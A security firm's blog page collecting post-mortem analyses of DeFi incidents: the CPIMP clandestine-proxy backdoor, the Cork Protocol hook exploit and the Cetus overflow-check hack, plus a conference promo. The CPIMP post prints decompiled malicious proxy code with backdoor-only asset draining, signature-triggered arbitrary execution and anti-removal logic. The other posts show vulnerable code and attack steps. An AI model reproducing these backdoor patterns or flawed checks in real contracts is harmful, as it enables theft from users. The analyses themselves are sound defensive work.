Blog

  • The CPIMP Attack: an insanely far-reaching vulnerability, successfully mitigated

    The CPIMP Attack: an insanely far-reaching vulnerability, successfully mitigated

    [by the Dedaub team]

    A major attack on several prominent DeFi protocols over many blockchains was (largely) successfully mitigated last week. The threat was potentially affecting (at a minimum) tens of millions of overall value, and yet the attacker was waiting for even more before making their move!

    The most technically-interesting aspects of the threat don’t have to do with the infection method, but with the attack’s clandestine nature: the attack contracts had been hiding in plain sight for weeks, infiltrating (in custom ways!) multiple protocols, while making sure that they remain entirely transparent to both regular protocol execution and to contract browsing on etherscan.

    We dub the attack vector CPIMP, for “Clandestine Proxy In the Middle of Proxy”, to capture its essence memorably.

    The Contact

    David Benchimol from Venn is no stranger. A few times before, he had brought to our attention potential attack vectors and we had long exchanges on determining feasibility and impact, with the help of our tools.

    In the afternoon of July 8, he made sure to put us on high alert, in a hurry!

    David was investigating a red flag raised by his colleague Ruslan Kasheparov. They had found several proxy initializations that had been apparently front-run, to insert malicious implementations.

    Nothing new here, right? Any uninitialized proxy contract can be taken over by the first caller of the initialization function.

    The difference in the case of the Clandestine Proxy In the Middle of Proxy (CPIMP) is that:

    • the CPIMP keeps track of the original intended implementation
    • the (legitimate owner’s) initialization transaction goes through, without reverting
    • the CPIMP stays in hiding, trying to be entirely transparent to the operation of the protocol: most normal calls propagate to the original implementation and execute correctly
    • at the end of every transaction, the CPIMP restores itself in the implementation slot of the proxy, so it is not removable by any usual or custom upgrade procedure
    • the CPIMP installation is done in such a way that it spoofs events and storage slot contents so that the most popular blockchain explorer, etherscan, reports the legitimate implementation, and not the CPIMP, as the implementation of the proxy.

    (In the future, etherscan will be updated to report the CPIMP correctly — more on that later.)

    So the CPIMP is truly a clandestine proxy in the middle!

    An example front-running initialization transaction is shown below.

    This is, of course, code controlled by the attacker. But note the two telltale Upgraded events.

    After this point, the victim proxy points to a malicious CPIMP as its implementation. Yet transactions proceed as normal. A careful observer can see the presence of the CPIMP in any transaction explorer:

    Note that dispatching the call required two delegatecall instructions, not just one! Instead of delegating from the proxy to the legitimate implementation, the execution delegates first to the CPIMP, who then delegates to the legitimate implementation.

    The attacker is simply lying in hiding, maybe waiting for bigger fish before they reveal their presence?

    The Impact

    At the time of contacting us, David already knew that this was not an isolated incident but one affecting tens of contracts. What none of us knew, however, was the extent of the threat.

    Drafting the right query on our DB to determine all affected contracts was not a trivial task. A reasonable first version looked like this:

    (If you run this query, be sure to set the Duration to more than the default “last 24 hrs”.)

    In the next hours, the query improved a lot, to capture all threatened contracts, over multiple networks, with very few false positives. But even early on, a clear picture emerged: there were many protocols at risk, and triaging the threat fully would take weeks, if not months!

    The contracts that had been taken over by CPIMPs belonged (in different chains) to projects like EtherFi, Pendle, Bera, Orderly Network, Origin, KIP Protocol, Myx, and several more tokens, protocols, oracles, etc. Not all of these were equally vulnerable. In many cases the threat was low. E.g., Pendle had successfully migrated from the infected contracts three weeks ago and confirmed that they are not vulnerable (although they lost some small amounts in the process because of anti-recovery mechanisms that the CPIMP employed).

    But with several tens of contracts already infected, and many of them appearing to have significant privileges, we had to act, even before fully determining the extent of the threat.

    The War Room

    SEAL 911 and its fearless leader @pcaversaccio are the absolute best to run any war room, and even more so for a war room over a broad, multi-protocol vulnerability!

    For the next 36 hours, we alternated frantically between triaging the threat over infected contracts and seeking contacts from all affected protocols that we could identify.

    The main problem was that mitigation could not be atomic and any “fix” for one protocol ran a grave risk of notifying the attacker that they have been discovered. This might cause imminent attacks on other protocols, possibly before we were even aware of the extent of the threat over these protocols. The attacker had months to prepare and estimate what they can steal, we only had hours!

    And triaging such a vulnerability is far from easy. Take the case of the Orderly Network CrossChainManager on BNB Chain. The contract can clearly perform actions (e.g., deposit) that will be accepted cross-chain, via Layer Zero. But how serious is the threat? Are there timelocks on the other end? Is there some off-chain alerting that will trigger and can help mitigate an attack? Without inspecting large amounts of code, one could not be sure of the severity of a potential attack.

    With all this in mind, the hours that followed saw the bringing into the war room security contacts for all affected protocols that we could find. SEAL’s @pcaversaccio ran the show and coordinated the rescues in a way that minimal information would be leaked. Every solution needed to be custom: in many cases, protocols had to work with a CPIMP that had to be fooled into approving their rescue transactions. Also, most rescues had to run at approximately the same time, before the attacker could react.

    The end result was not perfect, but it was very successful for such a broad vulnerability. The attack is still ongoing, with the attacker still trying to profit from victim contracts that remain vulnerable. However, the overwhelmingly largest part of the threat has been mitigated.

    David’s tweet is the best starting point for following the reactions and aftermath.

    Individual protocols have since published [their] [own] [disclosures].

    Dissecting the CPIMP: a Backdoor Powerhouse

    The true sophistication of the CPIMP emerges in inspecting its decompiled code, which we’ve analyzed across multiple variants. This reveals a highly-engineered contract designed for persistent dominance, flexibility, evading detection, and enabling targeted asset exfiltration. Below is a simplified summarized decompilation of an Ethereum variant, highlighting buried mechanisms like signature-triggered executions, granular routing, and shadow storage controls:

    // Manually reverse-engineered decompiled excerpt from malicious proxy (based 
    // on bytecode analysis)
    contract MaliciousProxy {
      address private immutable backdoor =
        0xa72df45a431b12ef4e37493d2bcf3d19af3d24fa;
      address private owner;  // Shadow owners possible via multiple slots
      address private _implementation;
      address private _admin;
      mapping(bytes4 => uint8) private selectorModes;  
        // 0=normal, 1=blocked, 2=permissioned
      mapping(bytes4 => address) private selectorToImpl;
      mapping(bytes4 => mapping(address => address)) private perCallerRouting;
      mapping(bytes4 => mapping(address => bool)) private permissions;
      mapping(bytes4 => bool) private silentFlags;  // Suppress events/logs
      mapping(address => bool) private whitelists;
      uint256 private nonce;  // Anti-replay in signatures
    
      modifier backdoorOrOwner() {
        if (msg.sender != backdoor && msg.sender != owner) 
          revert("Unauthorized");
          _;
      }
    
      // ?
     
      function drainAssets(address[] calldata tokens) external backdoorOrOwner {
        // Bulk drain tokens, with special handling of ETH
      }
    
      function signedTakeover(bytes calldata data, uint8 v, bytes32 r, 
                              bytes32 s) external {
        // Off-chain triggered via ecrecover
        bytes32 hash = keccak256(abi.encodePacked(
                          "\x19Ethereum Signed Message:\n", data.length, data));
        address signer = ecrecover(hash, v, r, s);
        require(signer == backdoor, "Invalid sig");
        this.delegatecall(data);  // Execute arbitrary payload
      }
    
      function updateRouting(bytes4[] calldata selectors, 
                             address[] calldata impls, 
                             uint8[] calldata modes) external backdoorOrOwner {
        // Granular routing updates
        for (uint i = 0; i < selectors.length; i++) {
          selectorToImpl[selectors[i]] = impls[i];
          selectorModes[selectors[i]] = modes[i];
        }
      }
    
      // Complex Routing logic 
      function getImplementation(bytes4 selector) private returns (address) {
        if (perSelectorRouting[selector][_implementation] != address(0)) {
          return perSelectorRouting[selector][_implementation];
        } else if (perSelectorRouting[selector][address(0)] != address(0)) {
          return perSelectorRouting[selector][address(0)];
        } else {
          return _implementation;
        }
      }
    
      // code to restore CPIMP in implementation slot(s)
      function postDelegateReset() private {
        // Slot integrity check/reset (prevents upgrades)
        if (STORAGE[keccak256("eip1967.proxy.implementation") - 1] != 
            _implementation) {
          STORAGE[keccak256("eip1967.proxy.implementation") - 1] =
            _implementation;
        }
        if (_admin != expectedAdmin) {  // Similarly for admin/beacon slots
          _admin = expectedAdmin;
        }
        // Additional resets for owners, nonces if altered during call
      }
    
      // Fallback delegates to routed implementation
      fallback() {
        address impl = getImplementation(msg.sig);
        (bool success, bytes memory ret) = impl.delegatecall(msg.data);
        require(success);
        postDelegateReset(); 
        assembly { return(add(ret, 0x20), mload(ret)) }
      }
    
      // Additional: Direct storage writes, nonce for replays, etc.
      function updateManyStorageSlots(uint[] index, bytes32[] value) 
       external backdoorOrOwner {
         // Updates multiple storage slots simultaneously
      }
    }

    Although the reverse-engineering above is incomplete, several important elements are clear. The CPIMP extends far beyond a simple relay, embedding a suite of controls for hijacking, persistence, and evasion:

    • Backdoor Authorization with Shadows: The hardcoded backdoor (0xa72df45a…) as an immutable variable overrides ownership for upgrades, drains, and executions, acting as a super-admin. Multiple “owner” slots (e.g., shadow admins) allow stealthy swaps, while the functionality enables unrestricted calls/delegatecalls.
    • Granular Function-Level Routing and Modes: Selectors map to custom implementations or per-caller targets, supporting partial hijacks (e.g., only divert transfers). Enum modes (normal/blocked/permissioned) add flexibility, with whitelists exempting users—ideal for selective attacks without alerting everyone.
    • Protocol-specific logic: The advanced routing mechanism enabled protocol-specific logic to be overridden, without triggering an upgrade to the malicious proxy. We’ve seen multiple instances of specific logic that was added by the attacker to thwart recovery. CPIMPs were sometimes nested, with one pointing to another.
    • Anti-recovery: some of the sub-proxies that are routed into have hard-coded checks in them to make sure that the balance does not dip by a specific amount in a single transaction (e.g., >90% transfers revert). In order to evade detection (calling a public function on itself that appears in a potential call trace), the attacker reads the storage slots directly. This prevented large rescues (e.g., >90% of balances), something that Pendle had to face in their recovery.
    • Restoring the CPIMP if removed: after delegating to the original implementation, the CPIMP restores itself in the implementation slot, to prevent upgrades that remove it.
    • Advanced Anti-Detection: Silent upgrades (which selectively emit an upgraded flag based on some preconditions).
    • Batch ETH and Token Draining: Fallback is payable, allowing ETH to accumulate. There is also bulk draining support, so arrays of tokens/ETH, including approvals and transfers to the backdoor can be done. 
    • Silent Attacks: Signed executions allow executions to take place on L2s, even if the admin/superadmin is blacklisted! Batch operations and direct storage writes (arbitrary slot sets) facilitate complex chains of operations that are needed to be performed to attack specific protocols.
    • Persistence and Automation Hooks: Counters/nonces track deployments, so that attacker does not mess up the proxy.

    The attacker’s investment shines through: This isn’t opportunistic — it’s a framework for automated, resilient campaigns to be triggered when the time comes.

    The Sneakiness

    What is perhaps most striking about the CPIMP attack is the sneakiness. The attacker was waiting for even bigger fish and has customized their different CPIMPs for different victims. The extent of manual effort per CPIMP infection seems substantial.

    Perhaps the most interesting of these measures has been the attacker’s attention to not being detectable by etherscan’s “read/write as proxy” feature. If one visits a victim contract’s page, etherscan does not report the CPIMP as the implementation, but instead lists the legitimate implementation contract.

    This is not too surprising, right? All that the attacker needs it to emit fake events, and the service will be fooled.

    Well … no!

    Etherscan implementation detection is more sophisticated than that and the attacker has spent significant effort circumventing it. Specifically, etherscan is consulting the value of storage slots in the proxy contract, in order to determine what is the implementation. Since there is no single standard for where a proxy stores the address of its implementation, however, each proxy type has its own. In this case, the proxies infected are EIP-1967 proxies. However, the attacker inserted the wrong implementation address in a slot used by an older OpenZeppelin proxy standard, fooling etherscan into reporting that slot’s contents as the implementation!

    The SEAL 911 war room brought in etherscan security contacts, in addition to the victim protocols. As a result, etherscan has quickly marked all contracts that our investigation identified, and is planning to fix the bug that led to the misleading implementation report.

    Parting Words

    Investigating and mitigating the CPIMP attack vector was a very interesting experience: this was an extensive, highly-sophisticated man-in-the-middle-style hijacking that had already infected many well-known protocols on several chains (ethereum, binance, arbitrum, base, bera, scroll, sonic).

    The adrenaline rush from the investigation was incredible and it’s rewarding that most potential loss has been prevented, via a well-coordinated effort. David put it best, so we’ll close with his message:

  • Dedaub at EthCC[8] | Smart Contract Security Before and After Deployment

    Dedaub at EthCC[8] | Smart Contract Security Before and After Deployment

    Dedaub at ETHCC

    Dedaub is heading to Cannes! As a WAGMI sponsor at EthCC[8], we’re bringing end-to-end smart contract security, combining rigorous auditing with continuous, custom-built monitoring. Security is a mindset. Auditing gets you to launch. Monitoring keeps you going.

    Dedaub’s security technology stack enables our team to analyze onchain data to create a comprehensive security framework tailored to your project’s unique risk profile and operational logic.

    EthCC[8] | Where to find us

    📍 Palais des Festivals, Cannes | WAGMI Sponsor Zone

    You’ll find us on Level 3, ready to showcase how Dedaub delivers ongoing protection. From pre-deployment threat modeling to real-time monitoring agents, we offer a tailored security lifecycle for your protocol.

    End-to-end Smart Contract Security

    Real-time Monitoring

    Dedaub provides a custom-built monitoring service, setting up and maintaining custom agents based on your protocol’s specific needs. Learn More.

    • DedaubQL-based monitoring agents tailored to your project’s threat model
    • Multi-chain, real-time decoded transaction database
    • Alerting on critical behaviors (vault withdrawals, governance actions, liquidation risks, etc.)
    • Continuous tuning to minimize noise and focus on actionable events

    Multi-Stage Audit Approach

    Auditing with Dedaub is an in-depth review of your protocol’s design, risks, and code. We identify critical vulnerabilities that could lead to real-world exploits. Learn More.

    • Every contract is reviewed line by line by at least two senior auditors, each covering 100% of the scope.
    • We run dual-phase reviews: first for intended logic, then from an adversarial perspective.
    • Findings are peer-reviewed and internally challenged to identify hidden risks and ensure complete clarity.
    • Our advanced technology stack employs over 70 analyses, supporting expert-led reasoning with comprehensive tooling. 

    About ETHCC[8]

    ETHCC[8] is the eighth edition of the Ethereum Community Conference, a major European gathering for the Ethereum ecosystem. It’s a four-day event focused on technology, community, and learning, taking place in Cannes, France, from June 30 to July 3, 2025. ETHCC is the largest annual European Ethereum event, organized by Ethereum France, and it serves as a space to connect, learn, share knowledge, and discuss the latest developments in Web3 technology.

  • The $11M Cork Protocol Hack: A Critical Lesson in Uniswap V4 Hook Security

    The $11M Cork Protocol Hack: A Critical Lesson in Uniswap V4 Hook Security

    On 28th of May 2025, Cork Protocol suffered an $11M exploit due multiple security weaknesses, culminating in a critical access control vulnerability in their Uniswap V4 hook implementation. The attacker exploited missing validation in the hook’s callback functions fooling the protocol into thinking that valuable tokens (Redemption Assets) were deposited by the attacker, thus crediting the attacker with a number of derivative tokens that could be exchanged back to other valuable tokens. The attacker also exploited a risk premium calculation, which compounded the attack. Among other things, this incident highlights the importance of proper access control in Uniswap V4 hooks and the risks of highly flexible open designs, which are very hard to secure.

    Background

    Understanding Cork Protocol

    Cork Protocol is a depeg insurance platform built on Uniswap V4 that allows users to hedge against stablecoin or liquid staking token depegs. The protocol operates with four token types per market:

    • RA (Redemption Asset): The “original” asset (e.g., wstETH)
    • PA (Pegged Asset): The “riskier” pegged asset (e.g., weETH)
    • DS (Depeg Swap): Insurance token that pays out if PA depegs from RA
    • CT (Cover Token): The counter-position that earns yield but loses value if depeg occurs

    Another way to think of the DS is a put option at a fixed strike price denominated in RA, while CT is the corresponding short put.

    Users can mint DS + CT by depositing RA, effectively splitting the redemption asset into two complementary positions. A legitimate transaction demonstrating this in action can be found here.

    Unlike modern options protocols such as Opyn, the DS is fully collateralized with RA, which simplifies trust assumptions.

    Understanding Uniswap V4

    Uniswap V4 represents a significant architectural shift, moving to a central PoolManager (Singleton pattern) and introducing ‘hooks’ – external contracts that the PoolManager calls at various points in a pool’s lifecycle (e.g., before or after swaps, liquidity changes). This design, as highlighted by security experts like Damien Rusinek, offers immense flexibility and customization but, as the Cork Protocol incident demonstrates, also introduces new, critical security considerations for developers.

    Vulnerability 1: Missing Access Control

    An important vulnerability in the CorkHook contract was a critical oversight directly echoing a common pitfall warned about by many security researchers. Cork’s Uniswap hooks were called by the attacker’s smart contract directly, mid-transaction. Let’s examine the vulnerable beforeSwap function:

    function beforeSwap(
    	address sender,
    	PoolKey calldata key,
    	IPoolManager.SwapParams calldata params,
    	bytes calldata hookData
    ) external override returns (bytes4, BeforeSwapDelta delta, uint24) {
    	PoolState storage self = pool[toAmmId(Currency.unwrap(key.currency0), Currency.unwrap(key.currency1))];
    	// kinda packed, avoid stack too deep 
    	delta = toBeforeSwapDelta(-int128(params.amountSpecified), int128(_beforeSwap(self, params, hookData, sender)));
    	// TODO: do we really need to specify the fee here?
    	return (this.beforeSwap.selector, delta, 0);
    }

    Critical Issue: This function lacks an onlyPoolManager modifier (allowing only calls from a trusted Uniswap v4 manager), meaning anyone can call it directly with arbitrary parameters. While the contract inherits from BaseHook, which provides access control for unlockCallback, it fails to protect other hook callbacks.

    // BaseHook provides this for unlockCallback: 
    modifier onlyPoolManager() {
    	require(msg.sender == address(poolManager), "Caller not pool manager"); _;
    }

    Vulnerability 2: Risk premium calculation rollover

    Risk premium, which affects the price of derivative (CT) tokens had an extreme value when close to expiry. The exploiter acquired a small amount of DS tokens close to the expiry, manipulating the price ratio of CT to RA tokens. On rollover (for a new expiry period), this skewed ratio was used to compute how many tokens of CT and RA to deposit to the AMM. With a skewed ratio of CT to RA tokens deposited, the exploiter could convert a very small amount of 0.0000029 wstETH to 3760.8813 weETH-CT.


    The Attack

    Cork Protocol allowed DS (Insurance) tokens from one market to be used as RA (Safe assets) tokens in another market. This was likely not an intentional design choice, and the protocol authors probably didn’t think of this possibility. An unintentional consequence of this is that relatively valuable tokens (DS tokens) from a good market can potentially be accessed from another market if there’s a vulnerability.

    This relatively obscure security weakness compounded the exploit perpetrated by this attacker in a very complex, multi-step attack.

    STEP 1: CROSS-MARKET TOKEN CONFUSION

    The attacker created a new market configuration that used one of the DS token in another market as an RA token in the new market.

    // Legitimate market
    Legit Market: {
    	RA: wstETH,
    	PA: weETH,
    	DS: weETH-DS,
    	CT: weETH-CT
    }
    
    // Attacker's new market 
    New Market: { 
    	RA: weETH-DS, // Using DS token as RA!
    	PA: wstETH,
    	DS: new_ds,
    	CT: new_ct
    }

    Step 2: Malicious Hook Contract

    The attacker deployed their own contract implementing the hook interface and rate provider interface. The custom rate provider appears to be a red herring in this attack – it simply returns a fixed rate.

    The new market utilized a fresh Uniswap v4 pool created as part of the new market. The attacker also created (in a separate transaction) a Uniswap pool with the same tokens as a the newly created pool (trading new_CT and weETH-DS) but with the hacker’s contract as the hook!

    Step 3: Direct Hook Manipulation

    This is where the action takes place. Due to the missing access control, the attacker could directly call beforeSwap to fool the protocol:

    This pool id of the maliciously-created pool was passed into the beforeSwap callback. The hook data supplied as part of the callback directed the protocol to an execution flow by which RAs are deposited and CT and DS tokens are returned. However, in such a transaction no RAs were deposited by the attacker. Instead an amount of roughly 3761 weETH-DS were credited towards the attacker. The carefully crafted hook data payload fooled Cork protocol into thinking that the attacker had deposited 3761 weETH-DS. By doing so the attacker illegitimately gains 3761 new_ct and 3761 new_ds tokens.

    Step 4: DS Token Extraction

    Once the attacker has gained the new_ct and new_ds tokens, the attacker used these to redeem weETH-DS tokens.

    Step 5: wstETH Token Extraction

    Note that in a previous step the attacker has also exploited another edge case to cheaply acquire weETH-CT tokens. Since writing this article, a clearer explanation was posted by the Cork protocol team about the miscalculations involved, however the essence is that the exploiter acquired a small amount of DS tokens close to the expiry, manipulating the price ratio of CT to RA tokens in the next expiry period. With this manipulation, the exploiter could convert 0.0000029 wstETH (a very small amount) to 3760.8813 weETH-CT.

    Now, all that remains to be done by the attacker is to redeem these weETH-CT and weETH-DS tokens through the protocol, as intended, to withdraw $11m of wstETH.

    Technical Deep Dive: Hook Manipulation

    The _beforeSwap function contains complex logic for handling swaps, including reserve updates and fee calculations:

    function _beforeSwap(
      PoolState storage self,
      IPoolManager.SwapParams calldata params,
      bytes calldata hookData,
      address sender
    ) internal returns (int256 unspecificiedAmount) {
        // ... swap calculations ...
        // Update reserves without validation
        self.updateReservesAsNative(Currency.unwrap(output), amountOut, true);
        // Settle tokens
        settleNormalized(output, poolManager, address(this), amountOut, true);
        // ... more logic ...
    }

    Without access control, an attacker can:

    • Manipulate reserve ratios before legitimate trades
    • Force the hook to settle tokens with arbitrary amounts
    • Bypass normal swap routing through the PoolManager

    Parsing the arguments used in hookData, the attacker crafted a payload intended to indicating that they deposited 3761 of weETH-DS tokens into the new market.

    Contributing Factors

    1. Decentralized Market Creation

    The protocol allowed anyone to create markets with any token pair. This is a courageous design decision, however it’s clearly hard to pull off correctly.

    function beforeInitialize(address, PoolKey calldata key, uint160) external ... {
        address token0 = Currency.unwrap(key.currency0);
        address token1 = Currency.unwrap(key.currency1);
        
        // Dedaub: No validation on token types!
        // Allows DS tokens to be used as RA tokens
    
    }

    2. Insufficient Token Validation

    The _saveIssuedAndMaturationTime function attempts to validate tokens but fails to ensure proper token types:

    function _saveIssuedAndMaturationTime(PoolState storage self) internal {
        IExpiry token0 = IExpiry(self.token0);
        IExpiry token1 = IExpiry(self.token1);
        // Dedaub: Only checks if tokens have expiry, not their type
        try token0.issuedAt() returns (uint256 issuedAt0) {
            self.startTimestamp = issuedAt0;
            self.endTimestamp = token0.expiry();
            return;
        } catch {}
        // ... similar for token1 ...
    }

    3. No Pool Whitelisting

    The callback allowed pools that had the same tokens, but a different hook contract. There was no validation on the pool id nor the hook contract address.

    mapping(PoolId => bool) public allowedPools;
    
    modifier onlyAllowedPool(PoolKey calldata key) {
        require(allowedPools[key.toId()], "Pool not allowed");
        _;
    }

    4. Singleton Design

    Tokens from the different markets co-mingled (Singleton pattern). Therefore, a vulnerability that was applied to the new market managed to extract tokens pertaining to another market.

    Previous Cork Protocol Audits

    Unfortunately, although the Cork protocol had undergone security reviews by four different audit providers, this incident still happened. The protocol team had clearly invested resources in security, making this exploit all the more tragic for both the team and users.

    However, among the four auditors, three of them didn’t audit the vulnerable hook contracts, and it is uncertain whether the risk premium issue could have been easily found just by looking at the code. It is likely that Cantina/Spearbit had the vulnerable CorkHook contract within their audit scope. A pull request with recommendations shows they did identify some issues and suggested improvements.

    Runtime Verification (another auditor who did not have CorkHook in their scope) presciently noted in their report:

    “An interesting follow-up engagement would be to prove the invariants for the CorkHook functions that are being invoked by different components verified within the scope of this engagement, as well as the functions of other contracts, such as CorkHook, Liquidator and HedgeUnit.”

    This observation now seems particularly prophetic, as it was precisely the CorkHook’s interaction with other components that enabled the exploit.

    Recommendations for Hook Developers

    If you’re building a project that interacts with Uniswap v4 Hooks in a meaningul way, get your code audited by experts in the area. Dedaub is Uniswap-whitelisted audit provider, with plenty of experience securing high-stakes projects. Since Dedaub is whitelisted by Uniswap, the audit can also be paid for via a Uniswap Foundation grant. In the meantime, follow the guidelines below. We also recommend listening to Damien Rusinek’s talk.

    Master Access Control and Permissions

    Strict PoolManager-Only Access: This is non-negotiable. Every external hook function that can modify state or is intended to be called by the PoolManager (e.g., beforeSwap, afterSwap, beforeInitialize) must implement robust access control, typically an onlyPoolManager modifier. This was a primary failing in the Cork exploit. As Damien and Hacken emphasize, allowing direct calls by arbitrary addresses is a direct path to state manipulation and fund loss. Cork didn’t follow this recommendation.

    Correct Hook Address Configuration: Uniswap V4 derives hook permissions (which functions the PoolManager will call) directly from the hook contract’s address.

    Address Mining: Deploy hooks using CREATE2 with a salt that ensures the deployed address correctly encodes all intended permissions (e.g., Hooks.BEFORE_SWAP_FLAG | Hooks.AFTER_SWAP_FLAG). Cork didn’t follow this recommendation.

    Mismatch Avoidance: A mismatch between the functions implemented in your hook and the permissions encoded in its address will lead to functions not being called or PoolManager attempting to call non-existent functions, causing reverts (DoS).

    Future-Proofing Upgrades: If you plan to add new hookable functions in future upgrades (for UUPS-style proxies), ensure the initial deployment address already encodes these future permissions. Alternatively, include placeholder functions for them.

    Inherit from BaseHook: Whenever possible, inherit from Uniswap’s BaseHook contract. It provides foundational security checks (like onlyPoolManager for unlockCallback) and helps ensure correct interface adherence, reducing the risk of configuration errors.

    Rigorous State Management and Pool Interaction

    Restrict Pools. If a hook is designed for a specific pool or set of pools, it must validate the PoolKey in its functions (especially initialization) to prevent unauthorized pools from using it. Consider implementing an allowedPools mapping and a modifier like onlyAllowedPool. Ensure the hook can only be initialized once (e.g., in beforeInitialize) to restrict it to a single pool if that’s the design. Cork didn’t follow this recommendation.

    Isolate State for Reusable Hooks: If a hook is intended to be shared across multiple legitimate pools, its internal state must be meticulously segregated (e.g., using mapping(PoolId => PoolSpecificData)). Failure to do so can lead to one pool’s activity corrupting another’s state, potentially locking funds or creating exploitable conditions.

    Prevent Cross-Market Token Contamination: As seen in the Cork exploit, avoid designs where tokens (especially sensitive ones like derivatives or collateral) from one market can be misinterpreted or misused as different token types in another market. Enforce strict token type validation at market creation and within hook logic.

    Understand sender vs. msg.sender vs. Transaction Originator. In hook functions like beforeSwap(address sender, ...) the sender parameter is typically the PoolOperator or the PoolManager itself, not the end-user (EOA) who initiated the transaction. If your hook logic needs the actual end-user, that address must be securely passed via the hookData parameter by a trusted PoolOperator.

    Understand Delta Accounting. BeforeSwapDelta and BalanceDelta are from the hook’s perspective. If the hook takes a fee, it must be a negative delta. If it grants a rebate, it’s a positive delta. Ensure the correct order of token deltas (e.g., specified vs. unspecified, or token0 vs. token1) based on the swap direction (params.zeroForOne). Crucially, all deltas must net to zero by the end of the unlockCallback. The PoolManager tracks this with NonzeroDeltaCount. Unsettled balances will cause the transaction to revert. Hooks modifying balances must ensure they (or the user) settle these amounts correctly (e.g., via settle() or take()).

    Upgradability: If your hook is upgradeable, recognize this as a significant trust assumption. A malicious or compromised owner can change the hook’s logic entirely. Ensure the upgrade mechanism is secure and governed transparently.

    Conclusion

    The Cork Protocol hack demonstrates that Uniswap V4 hooks, while powerful, introduce new security considerations that developers must carefully address. The combination of missing access controls and insufficient token validation created a perfect storm for exploitation. As the DeFi ecosystem continues to evolve with more composable protocols, developers must prioritize security at every layer of their architecture.

  • The Cetus AMM $200M Hack: How a Flawed “Overflow” Check Led to Catastrophic Loss

    The Cetus AMM $200M Hack: How a Flawed “Overflow” Check Led to Catastrophic Loss

    On May 22, 2025, the Cetus AMM on the Sui Network suffered a devastating hack resulting in over $200 million in losses. This incident represents one of the most significant DeFi exploits in recent history, caused by a subtle but critical flaw in “overflow” protection. This analysis dissects the technical details of the exploit and examines when this issue was introduced, fixed, and re-introduced.

    Executive Summary

    The attacker exploited a vulnerability that truncates the most significant bits in a liquidity calculation function of Cetus AMM. This calculation is invoked when a user opens an LP position. When opening such position, a user can open a large or small position by specifying a “liquidity” parameter (what fraction of the pool you would like to get in return), and supplying the corresponding amount of tokens. By manipulating the liquidity parameter to an extremely high value, they caused an overflow in the intermediate calculations that went undetected due to a flawed truncation check. This allowed them to add massive liquidity positions with just 1 unit of token input, subsequently draining pools collectively containing hundreds of millions of dollars worth of token.

    Note: the technical term for the issue is not “overflow”, but an MSB (most significant bits) truncation, but let’s call it “overflow” for simplicity.

    The Attack Sequence

    The attack unfolded in a carefully orchestrated sequence. Here’s an example of one such attack transaction (simplified):

    1. Flash Swap Initiation: The attacker borrowed 10 million haSUI through a flash swap with maximum slippage tolerance
    2. Position Creation: Opened a new liquidity position with tick range [300000, 300200] – an extremely narrow range at the upper bounds
    3. Liquidity Addition: Added liquidity with just 1 unit of token A, but received a massive liquidity value of 10,365,647,984,364,446,732,462,244,378,333,008. This action succeeded due to an undetected bitwise truncation.
    4. Liquidity Removal: Immediately removed the liquidity in multiple transactions, draining the pool
    5. Flash Loan Repayment: Repaid the flash swap and kept approximately 5.7 million SUI as profit

    Technical Deep Dive: The “Overflow” Vulnerability

    The root cause lies in the get_delta_a function within clmm_math.move, which calculates the amount of token A required for a given liquidity amount:

    public fun get_delta_a(
        sqrt_price_0: u128,
        sqrt_price_1: u128,
        liquidity: u128,
        round_up: bool
    ): u64 {
        let sqrt_price_diff = sqrt_price_1 - sqrt_price_0;
        
        let (numberator, overflowing) = math_u256::checked_shlw(
            // Dedaub: result doesn't fit in 192 bits
            full_math_u128::full_mul(liquidity, sqrt_price_diff)
        );
        // Dedaub: checked_shlw "overflows" result, since it << 64
        assert!(overflowing);
        
        let denominator = full_math_u128::full_mul(sqrt_price_0, sqrt_price_1);
        let quotient = math_u256::div_round(numberator, denominator, round_up);
        (quotient as u64)
    }

    The Mathematical Breakdown

    Using the actual values from the transaction:

    • liquidity: 10,365,647,984,364,446,732,462,244,378,333,008 (approximately 2^113)
    • sqrt_price_0: 60,257,519,765,924,248,467,716,150 (tick 300000)
    • sqrt_price_1: 60,863,087,478,126,617,965,993,239 (tick 300200)
    • sqrt_price_diff: 605,567,712,202,369,498,277,089 (approximately 2^79)

    The critical calculation:

    numerator = checked_shlw(liquidity * sqrt_price_diff)
              = checked_shlw(~2^113 * ~2^79)
              = checked_shlw(2^192 + ε)
              // checked_shlw shifts a 256-bit register by 64
              = ((2^192 + ε) * 2^64) mod 2^256
              = ε
    
    

    This multiplication produces a result exceeding 192 bits. When this value is left-shifted by 64 bits in checked_shlw (i.e., “checked shift left by one 64-bit word”) it overflows a 256-bit integer, but an overflow check designed for this check fails.

    But wait. Isn’t a checked operation supposed to prevent this issue?

    The Flawed Overflow Check

    The critical flaw lies in the checked_shlw function:

    public fun checked_shlw(n: u256): (u256, bool) {
        let mask = 0xffffffffffffffff << 192;  // This is incorrect!
        if (n > mask) {
            (0, true)
        } else {
            ((n << 64), false) // exact location of overflow
        }
    }

    The mask calculation 0xffffffffffffffff << 192 doesn’t produce the intended result. The developers likely intended to check if n >= (1 << 192), but the actual mask doesn’t serve this purpose. As a result, most values greater than 2^192 pass through undetected, and the subsequent left shift by 64 bits causes a silent overflow in Move (which doesn’t trigger runtime errors for shift operations).

    Integer Considerations

    In Move, the security around integer operations is designed to prevent overflow and underflow which can cause unexpected behavior or vulnerabilities. Specifically:

    • Additions (+) and multiplications (*) cause the program to abort if the result is too large for the integer type. An abort in this context means that the program will terminate immediately.
    • Subtractions (-) abort if the result is less than zero.
    • Division (/) abort if the divisor is zero.
    • Left Shift (<<), uniquely, does not abort in the event of an overflow. This means if the shifted bits exceed the storage capacity of the integer type, the program will not terminate, resulting in incorrect values or unpredictable behavior.

      It is normal for languages with checked arithmetic to not trigger errors when bit shifting truncates the result. Most smart contract auditors understand this.

    The Exploitation Impact

    Due to the overflow, the numerator wraps around to a very small value. When divided by the denominator, it produces a quotient close to 0. This means the function returns that only 1 unit of token A is required to mint the massive liquidity position.

    In mathematical terms:

    • Expected: very larger number of tokens required
    • Actual (due to overflow): 1 token required

    It is worth noting that the numeric values involved in the attack are precisely calculated – the attacker utilized some existing functions in the contract to compute these, notably get_liquidity_from_a.

    The Audit Trail: Similar Issue Found Before

    Ottersec’s audit identified an eerily similar overflow vulnerability in an earlier variant of the code (early 2023), specifically designed for Aptos:

    “The numberator value is not validated before running u256::shlw on it. As a result, the non-zero bytes might be removed, which leads to an incorrect calculation of the value.”

    They recommended replacing u256::shlw with u256::checked_shlw and adding overflow detection, which solved the issue. Note that this version of the code had custom implementations of 256-bit unsigned integer operations since Aptos didn’t support this naively at the time. Move 2 / Aptos CLI ≈ v1.10 rolled to mainnet early 2024.

